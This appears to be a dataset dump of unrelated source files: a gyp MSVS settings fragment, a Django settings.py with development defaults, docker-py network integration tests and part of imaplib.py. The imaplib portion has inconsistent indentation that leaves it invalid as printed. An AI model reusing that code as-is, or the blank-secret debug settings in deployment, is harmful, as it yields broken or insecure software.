_Same(_manifest, 'UpdateFileHashes', _boolean) # /hashupdate
_Same(_manifest, 'UpdateFileHashesSearchPath', _file_name)
_Same(_manifest, 'VerboseOutput', _boolean) # /verbose
# Options that have moved location.
_MovedAndRenamed(_manifest, 'ManifestResourceFile',
'ManifestResourceCompile',
'ResourceOutputFileName',
_file_name)
_Moved(_manifest, 'EmbedManifest', '', _boolean)
# MSVS options not found in MSBuild.
_MSVSOnly(_manifest, 'DependencyInformationFile', _file_name)
_MSVSOnly(_manifest, 'UseFAT32Workaround', _boolean)
_MSVSOnly(_manifest, 'UseUnicodeResponseFiles', _boolean)
# MSBuild options not found in MSVS.
_MSBuildOnly(_manifest, 'EnableDPIAwareness', _boolean)
_MSBuildOnly(_manifest, 'GenerateCategoryTags', _boolean) # /category
_MSBuildOnly(_manifest, 'ManifestFromManagedAssembly',
_file_name) # /managedassemblyname
_MSBuildOnly(_manifest, 'OutputResourceManifests', _string) # /outputresource
_MSBuildOnly(_manifest, 'SuppressDependencyElement', _boolean) # /nodependency
_MSBuildOnly(_manifest, 'TrackerLogDirectory', _folder_name)
# Directives for MASM.
# See "$(VCTargetsPath)\BuildCustomizations\masm.xml" for the schema of the
# MSBuild MASM settings.
# Options that have the same name in MSVS and MSBuild.
_Same(_masm, 'UseSafeExceptionHandlers', _boolean) # /safeseh
| gpl-3.0 |
hutchison/bp_mgmt | bp_mgmt/settings.py | 1 | 5012 | """
Django settings for bp_mgmt project.
Generated by 'django-admin startproject' using Django 1.8.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
GIT_DIR = BASE_DIR
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Generate a new secret key by executing this in a Python-Shell:
# >>> import random, string
# >>> "".join([random.SystemRandom().choice(
# string.digits + string.ascii_letters + string.punctuation
# ) for i in range(50)])
# NOTE(review): SECRET_KEY is deliberately left blank here and MUST be
# replaced with a real, secret value before any deployment.
SECRET_KEY = ' '
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.sites',
    'django.contrib.flatpages',
    'bp_cupid',
    'bp_setup',
    'kombu.transport.django',
    'djcelery',
    'actstream',
    'django_ace',
    'rest_framework',
    'simple_history',
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'django.middleware.security.SecurityMiddleware',
    'simple_history.middleware.HistoryRequestMiddleware',
)
# In DEBUG, authenticate against the local user database only; otherwise
# try LDAP first, then fall back to the local database.
if DEBUG:
    AUTHENTICATION_BACKENDS = (
        'django.contrib.auth.backends.ModelBackend',
    )
    AUTH_LDAP_URI = ''
    AUTH_LDAP_BASE_DN = ''
else:
    AUTHENTICATION_BACKENDS = (
        'django_auth_ldap3.backends.LDAPBackend',
        'django.contrib.auth.backends.ModelBackend',
    )
    # TODO: change this accordingly to your needs:
    AUTH_LDAP_URI = ''
    AUTH_LDAP_BASE_DN = ''
SITE_ID = 1
# Mails are printed to the console; swap for an SMTP backend in production.
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
ROOT_URLCONF = 'bp_mgmt.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'bp_mgmt.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Caching
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
        'LOCATION': '/var/tmp/django_cache',
    }
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'de-de'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# https://docs.djangoproject.com/en/1.8/ref/settings/#std:setting-MESSAGE_TAGS
# Map Django's ERROR message level onto Bootstrap's 'danger' CSS class.
from django.contrib.messages import constants as message_constants
MESSAGE_TAGS = {
    message_constants.ERROR: 'danger'
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
LOGIN_URL = '/login'
LOGIN_REDIRECT_URL = '/'
# Celery stuff:
# The Django ORM serves as both message broker and result backend
# (via kombu.transport.django / djcelery, see INSTALLED_APPS).
BROKER_URL = 'django://'
CELERY_RESULT_BACKEND='djcelery.backends.database:DatabaseBackend'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'handlers': {
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
        }
    },
    'loggers': {
        'django': {
            'handlers': ['console'],
            'propagate': True,
            'level':'INFO',
        },
        'bp_cupid': {
            'handlers': ['console'],
            'level': 'DEBUG',
        },
        'bp_setup': {
            'handlers': ['console'],
            'level': 'DEBUG',
        },
        'django_auth_ldap3': {
            'handlers': ['console'],
            'level': 'DEBUG',
        },
    },
}
REST_FRAMEWORK = {
    'DEFAULT_PERMISSION_CLASSES': [
        'rest_framework.permissions.IsAdminUser'
    ]
}
| agpl-3.0 |
rhatdan/docker-py | tests/integration/network_test.py | 1 | 3554 | import random
import docker
import pytest
from .. import helpers
from ..base import requires_api_version
@requires_api_version('1.21')
class TestNetworks(helpers.BaseTestCase):
    """Integration tests for the Docker network API (requires API >= 1.21).

    Runs against a live Docker daemon; created networks and containers are
    appended to self.tmp_networks / self.tmp_containers so the base class
    can clean them up afterwards.
    """
    def create_network(self, *args, **kwargs):
        """Create a uniquely named network, register it for cleanup, and
        return (name, id)."""
        # Random, length-capped name avoids collisions between test runs.
        net_name = u'dockerpy{}'.format(random.getrandbits(24))[:14]
        net_id = self.client.create_network(net_name, *args, **kwargs)['Id']
        self.tmp_networks.append(net_id)
        return (net_name, net_id)
    def test_list_networks(self):
        """networks() lists a newly created network and supports filtering
        by name and by (partial) id."""
        networks = self.client.networks()
        initial_size = len(networks)
        net_name, net_id = self.create_network()
        networks = self.client.networks()
        self.assertEqual(len(networks), initial_size + 1)
        self.assertTrue(net_id in [n['Id'] for n in networks])
        networks_by_name = self.client.networks(names=[net_name])
        self.assertEqual([n['Id'] for n in networks_by_name], [net_id])
        networks_by_partial_id = self.client.networks(ids=[net_id[:8]])
        self.assertEqual([n['Id'] for n in networks_by_partial_id], [net_id])
    def test_inspect_network(self):
        """inspect_network() reports the expected default attributes."""
        net_name, net_id = self.create_network()
        net = self.client.inspect_network(net_id)
        self.assertEqual(net['Id'], net_id)
        self.assertEqual(net['Name'], net_name)
        self.assertEqual(net['Driver'], 'bridge')
        self.assertEqual(net['Scope'], 'local')
        self.assertEqual(net['IPAM']['Driver'], 'default')
    def test_create_network_with_host_driver_fails(self):
        """Only one 'host' network may exist, so creating another must
        raise an APIError."""
        net_name = 'dockerpy{}'.format(random.getrandbits(24))[:14]
        with pytest.raises(docker.errors.APIError):
            self.client.create_network(net_name, driver='host')
    def test_remove_network(self):
        """remove_network() deletes the network from the daemon."""
        initial_size = len(self.client.networks())
        net_name, net_id = self.create_network()
        self.assertEqual(len(self.client.networks()), initial_size + 1)
        self.client.remove_network(net_id)
        self.assertEqual(len(self.client.networks()), initial_size)
    def test_connect_and_disconnect_container(self):
        """A container appears in / disappears from the network's
        'Containers' map as it is connected and disconnected."""
        net_name, net_id = self.create_network()
        container = self.client.create_container('busybox', 'top')
        self.tmp_containers.append(container)
        self.client.start(container)
        network_data = self.client.inspect_network(net_id)
        self.assertFalse(network_data.get('Containers'))
        self.client.connect_container_to_network(container, net_id)
        network_data = self.client.inspect_network(net_id)
        self.assertEqual(
            list(network_data['Containers'].keys()),
            [container['Id']])
        self.client.disconnect_container_from_network(container, net_id)
        network_data = self.client.inspect_network(net_id)
        self.assertFalse(network_data.get('Containers'))
    def test_connect_on_container_create(self):
        """A container created with network_mode=<network name> is attached
        to that network once started."""
        net_name, net_id = self.create_network()
        container = self.client.create_container(
            image='busybox',
            command='top',
            host_config=self.client.create_host_config(network_mode=net_name),
        )
        self.tmp_containers.append(container)
        self.client.start(container)
        network_data = self.client.inspect_network(net_id)
        self.assertEqual(
            list(network_data['Containers'].keys()),
            [container['Id']])
        self.client.disconnect_container_from_network(container, net_id)
        network_data = self.client.inspect_network(net_id)
        self.assertFalse(network_data.get('Containers'))
| apache-2.0 |
837468220/python-for-android | python3-alpha/python3-src/Lib/imaplib.py | 46 | 48132 | """IMAP4 client.
Based on RFC 2060.
Public class: IMAP4
Public variable: Debug
Public functions: Internaldate2tuple
Int2AP
ParseFlags
Time2Internaldate
"""
# Author: Piers Lauder <piers@cs.su.oz.au> December 1997.
#
# Authentication code contributed by Donn Cave <donn@u.washington.edu> June 1998.
# String method conversion by ESR, February 2001.
# GET/SETACL contributed by Anthony Baxter <anthony@interlink.com.au> April 2001.
# IMAP4_SSL contributed by Tino Lange <Tino.Lange@isg.de> March 2002.
# GET/SETQUOTA contributed by Andreas Zeidler <az@kreativkombinat.de> June 2002.
# PROXYAUTH contributed by Rick Holbert <holbert.13@osu.edu> November 2002.
# GET/SETANNOTATION contributed by Tomas Lindroos <skitta@abo.fi> June 2005.
__version__ = "2.58"
import binascii, errno, random, re, socket, subprocess, sys, time
# SSL support is optional: HAVE_SSL records whether the ssl module could be
# imported, so SSL-dependent classes can be defined conditionally.
try:
    import ssl
    HAVE_SSL = True
except ImportError:
    HAVE_SSL = False
__all__ = ["IMAP4", "IMAP4_stream", "Internaldate2tuple",
           "Int2AP", "ParseFlags", "Time2Internaldate"]
# Globals
CRLF = b'\r\n'                                  # IMAP4 line terminator
Debug = 0                                       # module-wide default debug level
IMAP4_PORT = 143                                # standard IMAP4 port
IMAP4_SSL_PORT = 993                            # standard IMAP4-over-SSL port
AllowedVersions = ('IMAP4REV1', 'IMAP4')        # Most recent first
# Commands
# Maps each IMAP4 command name to the tuple of connection states
# ('NONAUTH', 'AUTH', 'SELECTED', 'LOGOUT') in which it may be issued;
# _command() checks self.state against this table.
Commands = {
        # name            valid states
        'APPEND':       ('AUTH', 'SELECTED'),
        'AUTHENTICATE': ('NONAUTH',),
        'CAPABILITY':   ('NONAUTH', 'AUTH', 'SELECTED', 'LOGOUT'),
        'CHECK':        ('SELECTED',),
        'CLOSE':        ('SELECTED',),
        'COPY':         ('SELECTED',),
        'CREATE':       ('AUTH', 'SELECTED'),
        'DELETE':       ('AUTH', 'SELECTED'),
        'DELETEACL':    ('AUTH', 'SELECTED'),
        'EXAMINE':      ('AUTH', 'SELECTED'),
        'EXPUNGE':      ('SELECTED',),
        'FETCH':        ('SELECTED',),
        'GETACL':       ('AUTH', 'SELECTED'),
        'GETANNOTATION':('AUTH', 'SELECTED'),
        'GETQUOTA':     ('AUTH', 'SELECTED'),
        'GETQUOTAROOT': ('AUTH', 'SELECTED'),
        'MYRIGHTS':     ('AUTH', 'SELECTED'),
        'LIST':         ('AUTH', 'SELECTED'),
        'LOGIN':        ('NONAUTH',),
        'LOGOUT':       ('NONAUTH', 'AUTH', 'SELECTED', 'LOGOUT'),
        'LSUB':         ('AUTH', 'SELECTED'),
        'NAMESPACE':    ('AUTH', 'SELECTED'),
        'NOOP':         ('NONAUTH', 'AUTH', 'SELECTED', 'LOGOUT'),
        'PARTIAL':      ('SELECTED',),                                  # NB: obsolete
        'PROXYAUTH':    ('AUTH',),
        'RENAME':       ('AUTH', 'SELECTED'),
        'SEARCH':       ('SELECTED',),
        'SELECT':       ('AUTH', 'SELECTED'),
        'SETACL':       ('AUTH', 'SELECTED'),
        'SETANNOTATION':('AUTH', 'SELECTED'),
        'SETQUOTA':     ('AUTH', 'SELECTED'),
        'SORT':         ('SELECTED',),
        'STARTTLS':     ('NONAUTH',),
        'STATUS':       ('AUTH', 'SELECTED'),
        'STORE':        ('SELECTED',),
        'SUBSCRIBE':    ('AUTH', 'SELECTED'),
        'THREAD':       ('SELECTED',),
        'UID':          ('SELECTED',),
        'UNSUBSCRIBE':  ('AUTH', 'SELECTED'),
        }
# Patterns to match server responses
# Pre-compiled byte patterns for parsing server responses.
Continuation = re.compile(br'\+( (?P<data>.*))?')        # '+ ...' continuation request
Flags = re.compile(br'.*FLAGS \((?P<flags>[^\)]*)\)')    # FLAGS (...) in a response
InternalDate = re.compile(br'.*INTERNALDATE "'
        br'(?P<day>[ 0123][0-9])-(?P<mon>[A-Z][a-z][a-z])-(?P<year>[0-9][0-9][0-9][0-9])'
        br' (?P<hour>[0-9][0-9]):(?P<min>[0-9][0-9]):(?P<sec>[0-9][0-9])'
        br' (?P<zonen>[-+])(?P<zoneh>[0-9][0-9])(?P<zonem>[0-9][0-9])'
        br'"')
Literal = re.compile(br'.*{(?P<size>\d+)}$', re.ASCII)   # trailing {N} literal marker
MapCRLF = re.compile(br'\r\n|\r|\n')                     # any line ending, for CRLF normalization
Response_code = re.compile(br'\[(?P<type>[A-Z-]+)( (?P<data>[^\]]*))?\]')
Untagged_response = re.compile(br'\* (?P<type>[A-Z-]+)( (?P<data>.*))?')
Untagged_status = re.compile(
    br'\* (?P<data>\d+) (?P<type>[A-Z-]+)( (?P<data2>.*))?', re.ASCII)
class IMAP4:
"""IMAP4 client class.
Instantiate with: IMAP4([host[, port]])
host - host's name (default: localhost);
port - port number (default: standard IMAP4 port).
All IMAP4rev1 commands are supported by methods of the same
name (in lower-case).
All arguments to commands are converted to strings, except for
AUTHENTICATE, and the last argument to APPEND which is passed as
an IMAP4 literal. If necessary (the string contains any
non-printing characters or white-space and isn't enclosed with
either parentheses or double quotes) each string is quoted.
However, the 'password' argument to the LOGIN command is always
quoted. If you want to avoid having an argument string quoted
(eg: the 'flags' argument to STORE) then enclose the string in
parentheses (eg: "(\Deleted)").
Each command returns a tuple: (type, [data, ...]) where 'type'
is usually 'OK' or 'NO', and 'data' is either the text from the
tagged response, or untagged results from command. Each 'data'
is either a string, or a tuple. If a tuple, then the first part
is the header of the response, and the second part contains
the data (ie: 'literal' value).
Errors raise the exception class <instance>.error("<reason>").
IMAP4 server errors raise <instance>.abort("<reason>"),
which is a sub-class of 'error'. Mailbox status changes
from READ-WRITE to READ-ONLY raise the exception class
<instance>.readonly("<reason>"), which is a sub-class of 'abort'.
"error" exceptions imply a program error.
"abort" exceptions imply the connection should be reset, and
the command re-tried.
"readonly" exceptions imply the command should be re-tried.
Note: to use this module, you must read the RFCs pertaining to the
IMAP4 protocol, as the semantics of the arguments to each IMAP4
command are left to the invoker, not to mention the results. Also,
most IMAP servers implement a sub-set of the commands available here.
"""
class error(Exception): pass # Logical errors - debug required
class abort(error): pass # Service errors - close and retry
class readonly(abort): pass # Mailbox status changed to READ-ONLY
    def __init__(self, host = '', port = IMAP4_PORT):
        """Connect to 'host':'port' and perform the initial IMAP4 handshake.

        Leaves the connection in NONAUTH (or AUTH if the server pre-
        authenticated us).  On any handshake failure the socket is shut
        down before the exception propagates.
        """
        self.debug = Debug
        self.state = 'LOGOUT'
        self.literal = None # A literal argument to a command
        self.tagged_commands = {} # Tagged commands awaiting response
        self.untagged_responses = {} # {typ: [data, ...], ...}
        self.continuation_response = '' # Last continuation response
        self.is_readonly = False # READ-ONLY desired state
        self.tagnum = 0
        self._tls_established = False
        # Open socket to server.
        self.open(host, port)
        try:
            self._connect()
        except Exception:
            # Don't leak the socket if the greeting/handshake fails.
            try:
                self.shutdown()
            except socket.error:
                pass
            raise
    def _connect(self):
        """Read the server greeting, set the initial state, and verify the
        server advertises a supported IMAP4 protocol version."""
        # Create unique tag for this session,
        # and compile tagged response matcher.
        self.tagpre = Int2AP(random.randint(4096, 65535))
        self.tagre = re.compile(br'(?P<tag>'
                        + self.tagpre
                        + br'\d+) (?P<type>[A-Z]+) (?P<data>.*)', re.ASCII)
        # Get server welcome message,
        # request and store CAPABILITY response.
        if __debug__:
            self._cmd_log_len = 10
            self._cmd_log_idx = 0
            self._cmd_log = {} # Last `_cmd_log_len' interactions
            if self.debug >= 1:
                self._mesg('imaplib version %s' % __version__)
                self._mesg('new IMAP4 connection, tag=%s' % self.tagpre)
        self.welcome = self._get_response()
        # PREAUTH greeting means no login is required.
        if 'PREAUTH' in self.untagged_responses:
            self.state = 'AUTH'
        elif 'OK' in self.untagged_responses:
            self.state = 'NONAUTH'
        else:
            raise self.error(self.welcome)
        self._get_capabilities()
        if __debug__:
            if self.debug >= 3:
                self._mesg('CAPABILITIES: %r' % (self.capabilities,))
        # Accept the first (most recent) protocol version we know.
        for version in AllowedVersions:
            if not version in self.capabilities:
                continue
            self.PROTOCOL_VERSION = version
            return
        raise self.error('server not IMAP4 compliant')
def __getattr__(self, attr):
# Allow UPPERCASE variants of IMAP4 command methods.
if attr in Commands:
return getattr(self, attr.lower())
raise AttributeError("Unknown IMAP4 command: '%s'" % attr)
# Overridable methods
def _create_socket(self):
return socket.create_connection((self.host, self.port))
    def open(self, host = '', port = IMAP4_PORT):
        """Setup connection to remote server on "host:port"
            (default: localhost:standard IMAP4 port).
        This connection will be used by the routines:
            read, readline, send, shutdown.
        """
        self.host = host
        self.port = port
        self.sock = self._create_socket()
        # Buffered binary file wrapper over the socket; all reads go
        # through this object, all writes through self.sock directly.
        self.file = self.sock.makefile('rb')
def read(self, size):
"""Read 'size' bytes from remote."""
chunks = []
read = 0
while read < size:
data = self.file.read(min(size-read, 4096))
if not data:
break
read += len(data)
chunks.append(data)
return b''.join(chunks)
    def readline(self):
        """Read line from remote."""
        # Delegates to the buffered file object created in open().
        return self.file.readline()
    def send(self, data):
        """Send data to remote."""
        # sendall() blocks until every byte has been handed to the kernel.
        self.sock.sendall(data)
    def shutdown(self):
        """Close I/O established in "open"."""
        self.file.close()
        try:
            self.sock.shutdown(socket.SHUT_RDWR)
        except socket.error as e:
            # The server might already have closed the connection
            if e.errno != errno.ENOTCONN:
                raise
        finally:
            # Always release the file descriptor, even if shutdown failed.
            self.sock.close()
    def socket(self):
        """Return socket instance used to connect to IMAP4 server.

        socket = <instance>.socket()
        """
        return self.sock
# Utility methods
def recent(self):
"""Return most recent 'RECENT' responses if any exist,
else prompt server for an update using the 'NOOP' command.
(typ, [data]) = <instance>.recent()
'data' is None if no new messages,
else list of RECENT responses, most recent last.
"""
name = 'RECENT'
typ, dat = self._untagged_response('OK', [None], name)
if dat[-1]:
return typ, dat
typ, dat = self.noop() # Prod server for response
return self._untagged_response(typ, dat, name)
    def response(self, code):
        """Return data for response 'code' if received, or None.

        Old value for response 'code' is cleared.

        (code, [data]) = <instance>.response(code)
        """
        # Codes are stored upper-cased in untagged_responses.
        return self._untagged_response(code, [None], code.upper())
# IMAP4 commands
def append(self, mailbox, flags, date_time, message):
"""Append message to named mailbox.
(typ, [data]) = <instance>.append(mailbox, flags, date_time, message)
All args except `message' can be None.
"""
name = 'APPEND'
if not mailbox:
mailbox = 'INBOX'
if flags:
if (flags[0],flags[-1]) != ('(',')'):
flags = '(%s)' % flags
else:
flags = None
if date_time:
date_time = Time2Internaldate(date_time)
else:
date_time = None
self.literal = MapCRLF.sub(CRLF, message)
return self._simple_command(name, mailbox, flags, date_time)
    def authenticate(self, mechanism, authobject):
        """Authenticate command - requires response processing.

        'mechanism' specifies which authentication mechanism is to
        be used - it must appear in <instance>.capabilities in the
        form AUTH=<mechanism>.

        'authobject' must be a callable object:

                data = authobject(response)

        It will be called to process server continuation responses.
        It should return data that will be encoded and sent to server.
        It should return None if the client abort response '*' should
        be sent instead.
        """
        mech = mechanism.upper()
        # XXX: shouldn't this code be removed, not commented out?
        #cap = 'AUTH=%s' % mech
        #if not cap in self.capabilities: # Let the server decide!
        #    raise self.error("Server doesn't allow %s authentication." % mech)
        # The authenticator handles the base64 challenge/response exchange
        # via the literal mechanism of _command().
        self.literal = _Authenticator(authobject).process
        typ, dat = self._simple_command('AUTHENTICATE', mech)
        if typ != 'OK':
            raise self.error(dat[-1])
        # Successful authentication moves the connection to AUTH state.
        self.state = 'AUTH'
        return typ, dat
def capability(self):
"""(typ, [data]) = <instance>.capability()
Fetch capabilities list from server."""
name = 'CAPABILITY'
typ, dat = self._simple_command(name)
return self._untagged_response(typ, dat, name)
    def check(self):
        """Checkpoint mailbox on server.

        (typ, [data]) = <instance>.check()
        """
        # Valid only in SELECTED state (see Commands table).
        return self._simple_command('CHECK')
    def close(self):
        """Close currently selected mailbox.

        Deleted messages are removed from writable mailbox.

        This is the recommended command before 'LOGOUT'.

        (typ, [data]) = <instance>.close()
        """
        try:
            typ, dat = self._simple_command('CLOSE')
        finally:
            # Drop back to AUTH state even if the command failed.
            self.state = 'AUTH'
        return typ, dat
    def copy(self, message_set, new_mailbox):
        """Copy 'message_set' messages onto end of 'new_mailbox'.

        (typ, [data]) = <instance>.copy(message_set, new_mailbox)
        """
        # Thin wrapper; valid only in SELECTED state.
        return self._simple_command('COPY', message_set, new_mailbox)
    def create(self, mailbox):
        """Create new mailbox.

        (typ, [data]) = <instance>.create(mailbox)
        """
        return self._simple_command('CREATE', mailbox)
    def delete(self, mailbox):
        """Delete old mailbox.

        (typ, [data]) = <instance>.delete(mailbox)
        """
        return self._simple_command('DELETE', mailbox)
    def deleteacl(self, mailbox, who):
        """Delete the ACLs (remove any rights) set for who on mailbox.

        (typ, [data]) = <instance>.deleteacl(mailbox, who)
        """
        # Part of the IMAP4 ACL extension (rfc2086/rfc4314).
        return self._simple_command('DELETEACL', mailbox, who)
def expunge(self):
"""Permanently remove deleted items from selected mailbox.
Generates 'EXPUNGE' response for each deleted message.
(typ, [data]) = <instance>.expunge()
'data' is list of 'EXPUNGE'd message numbers in order received.
"""
name = 'EXPUNGE'
typ, dat = self._simple_command(name)
return self._untagged_response(typ, dat, name)
def fetch(self, message_set, message_parts):
"""Fetch (parts of) messages.
(typ, [data, ...]) = <instance>.fetch(message_set, message_parts)
'message_parts' should be a string of selected parts
enclosed in parentheses, eg: "(UID BODY[TEXT])".
'data' are tuples of message part envelope and data.
"""
name = 'FETCH'
typ, dat = self._simple_command(name, message_set, message_parts)
return self._untagged_response(typ, dat, name)
    def getacl(self, mailbox):
        """Get the ACLs for a mailbox.

        (typ, [data]) = <instance>.getacl(mailbox)
        """
        typ, dat = self._simple_command('GETACL', mailbox)
        # Results arrive as untagged 'ACL' responses.
        return self._untagged_response(typ, dat, 'ACL')
    def getannotation(self, mailbox, entry, attribute):
        """(typ, [data]) = <instance>.getannotation(mailbox, entry, attribute)
        Retrieve ANNOTATIONs."""
        # ANNOTATE extension; results arrive as untagged 'ANNOTATION' lines.
        typ, dat = self._simple_command('GETANNOTATION', mailbox, entry, attribute)
        return self._untagged_response(typ, dat, 'ANNOTATION')
    def getquota(self, root):
        """Get the quota root's resource usage and limits.

        Part of the IMAP4 QUOTA extension defined in rfc2087.

        (typ, [data]) = <instance>.getquota(root)
        """
        typ, dat = self._simple_command('GETQUOTA', root)
        return self._untagged_response(typ, dat, 'QUOTA')
    def getquotaroot(self, mailbox):
        """Get the list of quota roots for the named mailbox.

        (typ, [[QUOTAROOT responses...], [QUOTA responses]]) = <instance>.getquotaroot(mailbox)
        """
        typ, dat = self._simple_command('GETQUOTAROOT', mailbox)
        # Both untagged response types are parsed from the same reply.
        typ, quota = self._untagged_response(typ, dat, 'QUOTA')
        typ, quotaroot = self._untagged_response(typ, dat, 'QUOTAROOT')
        return typ, [quotaroot, quota]
def list(self, directory='""', pattern='*'):
"""List mailbox names in directory matching pattern.
(typ, [data]) = <instance>.list(directory='""', pattern='*')
'data' is list of LIST responses.
"""
name = 'LIST'
typ, dat = self._simple_command(name, directory, pattern)
return self._untagged_response(typ, dat, name)
    def login(self, user, password):
        """Identify client using plaintext password.

        (typ, [data]) = <instance>.login(user, password)

        NB: 'password' will be quoted.
        """
        typ, dat = self._simple_command('LOGIN', user, self._quote(password))
        if typ != 'OK':
            raise self.error(dat[-1])
        # Successful login moves the connection to AUTH state.
        self.state = 'AUTH'
        return typ, dat
    def login_cram_md5(self, user, password):
        """ Force use of CRAM-MD5 authentication.

        (typ, [data]) = <instance>.login_cram_md5(user, password)
        """
        # Credentials are stashed on self for _CRAM_MD5_AUTH to consume.
        self.user, self.password = user, password
        return self.authenticate('CRAM-MD5', self._CRAM_MD5_AUTH)
def _CRAM_MD5_AUTH(self, challenge):
""" Authobject to use with CRAM-MD5 authentication. """
import hmac
return self.user + " " + hmac.HMAC(self.password, challenge).hexdigest()
def logout(self):
"""Shutdown connection to server.
(typ, [data]) = <instance>.logout()
Returns server 'BYE' response.
"""
self.state = 'LOGOUT'
try: typ, dat = self._simple_command('LOGOUT')
except: typ, dat = 'NO', ['%s: %s' % sys.exc_info()[:2]]
self.shutdown()
if 'BYE' in self.untagged_responses:
return 'BYE', self.untagged_responses['BYE']
return typ, dat
def lsub(self, directory='""', pattern='*'):
"""List 'subscribed' mailbox names in directory matching pattern.
(typ, [data, ...]) = <instance>.lsub(directory='""', pattern='*')
'data' are tuples of message part envelope and data.
"""
name = 'LSUB'
typ, dat = self._simple_command(name, directory, pattern)
return self._untagged_response(typ, dat, name)
def myrights(self, mailbox):
"""Show my ACLs for a mailbox (i.e. the rights that I have on mailbox).
(typ, [data]) = <instance>.myrights(mailbox)
"""
typ,dat = self._simple_command('MYRIGHTS', mailbox)
return self._untagged_response(typ, dat, 'MYRIGHTS')
def namespace(self):
""" Returns IMAP namespaces ala rfc2342
(typ, [data, ...]) = <instance>.namespace()
"""
name = 'NAMESPACE'
typ, dat = self._simple_command(name)
return self._untagged_response(typ, dat, name)
def noop(self):
    """Send NOOP command.

    (typ, [data]) = <instance>.noop()
    """
    # Dumping the pending untagged responses is purely a debugging aid;
    # NOOP itself is just a keep-alive / mailbox-state poll.
    if __debug__:
        if self.debug >= 3:
            self._dump_ur(self.untagged_responses)
    return self._simple_command('NOOP')
def partial(self, message_num, message_part, start, length):
    """Fetch truncated part of a message.

    (typ, [data, ...]) = <instance>.partial(message_num, message_part, start, length)

    'data' is tuple of message part envelope and data.
    """
    name = 'PARTIAL'
    typ, dat = self._simple_command(name, message_num, message_part, start, length)
    # The server reports PARTIAL results via untagged FETCH responses.
    return self._untagged_response(typ, dat, 'FETCH')
def proxyauth(self, user):
    """Assume authentication as "user".

    Allows an authorised administrator to proxy into any user's
    mailbox.

    (typ, [data]) = <instance>.proxyauth(user)
    """
    # Tidy-up: 'name' was assigned but never used; route the command
    # through it for consistency with the sibling methods.
    name = 'PROXYAUTH'
    return self._simple_command(name, user)
def rename(self, oldmailbox, newmailbox):
    """Rename old mailbox name to new.

    (typ, [data]) = <instance>.rename(oldmailbox, newmailbox)
    """
    # No untagged data is expected; the tagged status is the answer.
    typ, dat = self._simple_command('RENAME', oldmailbox, newmailbox)
    return typ, dat
def search(self, charset, *criteria):
    """Search mailbox for matching messages.

    (typ, [data]) = <instance>.search(charset, criterion, ...)

    'data' is space separated list of matching message numbers.
    """
    name = 'SEARCH'
    # A truthy charset is sent as a leading 'CHARSET <charset>' pair.
    if charset:
        args = ('CHARSET', charset) + criteria
    else:
        args = criteria
    typ, dat = self._simple_command(name, *args)
    return self._untagged_response(typ, dat, name)
def select(self, mailbox='INBOX', readonly=False):
    """Select a mailbox.

    Flush all untagged responses.

    (typ, [data]) = <instance>.select(mailbox='INBOX', readonly=False)

    'data' is count of messages in mailbox ('EXISTS' response).

    Mandated responses are ('FLAGS', 'EXISTS', 'RECENT', 'UIDVALIDITY'), so
    other responses should be obtained via <instance>.response('FLAGS') etc.
    """
    self.untagged_responses = {}    # Flush old responses.
    self.is_readonly = readonly
    # EXAMINE is the read-only flavour of SELECT.
    if readonly:
        name = 'EXAMINE'
    else:
        name = 'SELECT'
    typ, dat = self._simple_command(name, mailbox)
    if typ != 'OK':
        self.state = 'AUTH'     # Might have been 'SELECTED'
        return typ, dat
    self.state = 'SELECTED'
    # The server may force read-only (e.g. via [READ-ONLY] response code)
    # even when we asked for write access; treat that as an error.
    if 'READ-ONLY' in self.untagged_responses \
            and not readonly:
        if __debug__:
            if self.debug >= 1:
                self._dump_ur(self.untagged_responses)
        raise self.readonly('%s is not writable' % mailbox)
    return typ, self.untagged_responses.get('EXISTS', [None])
def setacl(self, mailbox, who, what):
    """Set a mailbox acl.

    (typ, [data]) = <instance>.setacl(mailbox, who, what)
    """
    # No untagged data is expected; the tagged status is the answer.
    return self._simple_command('SETACL', mailbox, who, what)
def setannotation(self, *args):
    """(typ, [data]) = <instance>.setannotation(mailbox[, entry, attribute]+)
    Set ANNOTATIONs."""
    typ, dat = self._simple_command('SETANNOTATION', *args)
    # Any resulting data arrives as untagged ANNOTATION responses.
